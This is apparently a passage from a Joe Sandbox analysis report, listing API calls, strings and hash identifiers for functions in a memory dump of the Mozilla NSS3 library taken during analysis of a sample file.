  • Part of subcall function 6C473E60: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
  • Part of subcall function 6C473E60: PL_FreeArenaPool.NSS3 ref: 6C473F14
  • Part of subcall function 6C473E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
• String ID:
• API String ID: 3941837925-0
APIs
  • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
  • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
  • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
• PR_GetCurrentThread.NSS3 ref: 6C477CFD
  • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
• SECITEM_ItemsAreEqual_Util.NSS3(?,6C599030), ref: 6C477D1B
  • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
• SECITEM_ItemsAreEqual_Util.NSS3(?,6C599048), ref: 6C477D2F
• SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C477D50
• PR_GetCurrentThread.NSS3 ref: 6C477D61
• PORT_ArenaMark_Util.NSS3(?), ref: 6C477D7D
• free.MOZGLUE(?), ref: 6C477D9C
• CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C477DB8
• PR_SetError.NSS3(FFFFE023,00000000), ref: 6C477E19
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
• String ID:
• API String ID: 70581797-0
APIs
• free.MOZGLUE(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F15
• DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F36
• free.MOZGLUE(?,?,?,6C4880DD), ref: 6C487F3D
• SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C4880DD), ref: 6C487F5D
• DeleteCriticalSection.KERNEL32(?,6C4880DD), ref: 6C487F94
• free.MOZGLUE(?), ref: 6C487F9B
• PR_SetError.NSS3(FFFFE08B,00000000,6C4880DD), ref: 6C487FD0
• PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C4880DD), ref: 6C487FE6
• free.MOZGLUE(?,6C4880DD), ref: 6C48802D
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
• String ID:
• API String ID: 4037168058-0
APIs
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4CFF00
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF18
• PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4CFF26
• PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF4F
• PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4CFF7A
• memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C4CFF8C
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
• String ID:
• API String ID: 1233137751-0
APIs
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E27
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E67
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C417EED
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417F2E
Similarity
• API ID: _byteswap_ulongsqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 912837312-598938438
APIs
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFD7A
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFD94
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFE3C
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFE83
  • Part of subcall function 6C3FFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C3FFEFA
  • Part of subcall function 6C3FFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C3FFF3B
Similarity
• API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 1169254434-598938438
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C542FFD
• sqlite3_initialize.NSS3 ref: 6C543007
• memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C543032
• sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C543073
• sqlite3_free.NSS3(?), ref: 6C5430B3
• sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C5430C0
Strings
• sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C5430BB
Similarity
• API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
• String ID: sqlite3_get_table() called with two or more incompatible queries
• API String ID: 750880481-4279182443
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]Ll), ref: 6C4C5F0A
• TlsGetValue.KERNEL32 ref: 6C4C5F1F
• EnterCriticalSection.KERNEL32(89000904), ref: 6C4C5F2F
• PR_Unlock.NSS3(890008E8), ref: 6C4C5F55
• PR_SetError.NSS3(00000000,00000000), ref: 6C4C5F6D
• SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C4C5F7D
  • Part of subcall function 6C4C5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C4C5F82,8B4274C0), ref: 6C4C5248
  • Part of subcall function 6C4C5220: EnterCriticalSection.KERNEL32(0F6C590D,?,6C4C5F82,8B4274C0), ref: 6C4C525C
  • Part of subcall function 6C4C5220: PR_SetError.NSS3(00000000,00000000), ref: 6C4C528E
  • Part of subcall function 6C4C5220: PR_Unlock.NSS3(0F6C58F1), ref: 6C4C5299
  • Part of subcall function 6C4C5220: free.MOZGLUE(00000000), ref: 6C4C52A9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                                          • String ID: q]Ll
                                                                                                                                                                                                                          • API String ID: 3150690610-2389411964
                                                                                                                                                                                                                          • Opcode ID: 9098cf7d60571c0381959237c82e69a9088f20df36ade76c725f6e0b0e8c8590
                                                                                                                                                                                                                          • Instruction ID: e4d1f074e7704d1cf2365ad76fd5034e038640adcbaffb25e16ebf834c85eb66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9098cf7d60571c0381959237c82e69a9088f20df36ade76c725f6e0b0e8c8590
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF21E4B5E002149BDB00EF64EC41FEEB7B4EF49318F540029E80AA7710E731A904CBD1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6C49124D,00000001), ref: 6C488D19
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C49124D,00000001), ref: 6C488D32
                                                                                                                                                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D73
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488DBA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                          • String ID: KRAM$KRAM
                                                                                                                                                                                                                          • API String ID: 2419422920-169145855
                                                                                                                                                                                                                          • Opcode ID: 6695d7dbdec31c978f98760feba9799d9a3f20475f8ca6c43043d5d48a1794de
                                                                                                                                                                                                                          • Instruction ID: 0815e0f8eebf7ee43174b1a6fca95840e92f85d1ed8964273777b8df50d1f5e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6695d7dbdec31c978f98760feba9799d9a3f20475f8ca6c43043d5d48a1794de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4321A1B5A05601CFDB40EF38C884D5AB7F0FF95319F15896AD8998B701D730E882CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
                                                                                                                                                                                                                            • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                          • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                          • Opcode ID: 234b9fdb32172bf0b7010a056cd347d8a294a0079b3cec7361a0cccaa4dd6fb0
                                                                                                                                                                                                                          • Instruction ID: 6153c19723dd482b28a669b5c0c3acdf54a3cfcc9ea85e28885e5c487b7594fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 234b9fdb32172bf0b7010a056cd347d8a294a0079b3cec7361a0cccaa4dd6fb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0701C0B6901154ABDF01AF64DC85CAB3F3CEF86368B024069FD0997B01D731EA5086A2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Fl,?,?,6C464E1D), ref: 6C561C8A
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C561CB6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                          • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Fl
                                                                                                                                                                                                                          • API String ID: 1840970956-1300945822
                                                                                                                                                                                                                          • Opcode ID: 2049cc8b4f8600980df4b2b975f56f29a7c3e0cf7973a311db0c0aa4f0237b3c
                                                                                                                                                                                                                          • Instruction ID: 084cef2e87514878ac3b4a3e0c2eb4077d46f2b90b5b52c0c6a12f89f1b917ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2049cc8b4f8600980df4b2b975f56f29a7c3e0cf7973a311db0c0aa4f0237b3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB0124B1A001404BE700BE69D802D7A73E5EF8634CB15086DE8858BB12EB32E867C791
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544DC3
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544DE0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C544DBD
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544DCB
                                                                                                                                                                                                                          • invalid, xrefs: 6C544DB8
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C544DDA
                                                                                                                                                                                                                          • misuse, xrefs: 6C544DD5
                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544E30
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544E4D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C544E2A
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544E38
                                                                                                                                                                                                                          • invalid, xrefs: 6C544E25
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C544E47
                                                                                                                                                                                                                          • misuse, xrefs: 6C544E42
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C47A086
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C47A09B
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C47A0B7
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A0E9
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C47A11B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C47A12F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C47A148
                                                                                                                                                                                                                            • Part of subcall function 6C491A40: PR_Now.NSS3(?,00000000,6C4728AD,00000000,?,6C48F09A,00000000,6C4728AD,6C4793B0,?,6C4793B0,6C4728AD,00000000,?,00000000), ref: 6C491A65
                                                                                                                                                                                                                            • Part of subcall function 6C491940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C494126,?), ref: 6C491966
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A1A3
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3953697463-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000,?,?), ref: 6C4B0CB3
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DC1
                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DEC
                                                                                                                                                                                                                            • Part of subcall function 6C4D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
                                                                                                                                                                                                                            • Part of subcall function 6C4D0F10: malloc.MOZGLUE(00000001), ref: 6C4D0F30
                                                                                                                                                                                                                            • Part of subcall function 6C4D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0DFF
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000), ref: 6C4B0E16
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E53
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000), ref: 6C4B0E65
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E79
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                            • Part of subcall function 6C48B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C491397,00000000,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1CB
                                                                                                                                                                                                                            • Part of subcall function 6C48B1A0: free.MOZGLUE(5B5F5EC0,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1D2
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C4888AE,-00000008), ref: 6C488A04
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: EnterCriticalSection.KERNEL32(?), ref: 6C488A15
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: memset.VCRUNTIME140(6C4888AE,00000000,00000132), ref: 6C488A27
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: PR_Unlock.NSS3(?), ref: 6C488A35
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1601681851-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C466ED8
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C466EE5
                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C466FA8
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6C466FDB
                                                                                                                                                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C466FF0
                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C467010
                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C46701D
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C467052
                                                                                                                                                                                                                          Memory Dump Source
